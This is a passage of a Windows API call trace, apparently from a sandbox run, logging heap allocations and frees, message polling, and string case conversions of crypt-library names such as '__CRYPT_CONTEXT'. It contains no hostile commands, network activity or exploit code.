Flags=0x0, Size=0x8) returned 0x43e2d00 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0101.803] PeekMessageW (in: lpMsg=0x144e404, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e404) returned 0 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0101.803] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0101.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0101.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0101.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0101.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0101.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0101.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0101.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0101.804] PeekMessageW (in: lpMsg=0x144e23c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e23c) returned 0 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0101.804] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0101.804] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.804] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0101.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0101.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0101.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0101.805] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0101.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0101.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0101.806] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0101.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0101.806] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0101.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0101.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0101.806] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0101.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0101.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0101.806] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0101.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0101.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0101.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0101.807] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0101.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0101.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0101.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0101.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0101.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0101.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0101.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0101.808] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.808] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0101.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0101.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0101.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0101.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0101.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0101.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0101.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0101.808] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0101.809] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0101.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0101.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0101.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0101.809] PeekMessageW (in: lpMsg=0x144e54c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e54c) returned 0 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0101.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0101.810] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0101.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0101.811] PeekMessageW (in: lpMsg=0x144e54c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e54c) returned 0 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0101.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0101.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0101.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0101.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: 